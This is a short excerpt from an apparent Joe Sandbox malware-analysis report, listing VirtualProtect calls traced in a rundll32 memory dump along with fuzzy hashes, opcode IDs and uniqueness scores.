    • Instruction Fuzzy Hash: 9151FA74A0010AEFDF18CF98C581BAEBBB2FF48304F248169D525AB345D735EA91CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 01182468
    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 011824B2
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID: @
    • API String ID: 544645111-2766056989
    • Opcode ID: 5f6fbaf245827d826662a090f3b9b8f553eaea5ed9bbfe0413b36b76f2cc1cc8
    • Instruction ID: 9a76771112f446554f9c85e8598d973e0e3de8fe2b7e066cf6f3d18df6761471
    • Opcode Fuzzy Hash: 5f6fbaf245827d826662a090f3b9b8f553eaea5ed9bbfe0413b36b76f2cc1cc8
    • Instruction Fuzzy Hash: 512118B4A04208EFDF19DF98C880BADBBB5BF44304F24C199D906AB245C374AB80DF61
    Uniqueness

    Uniqueness Score: -1.00%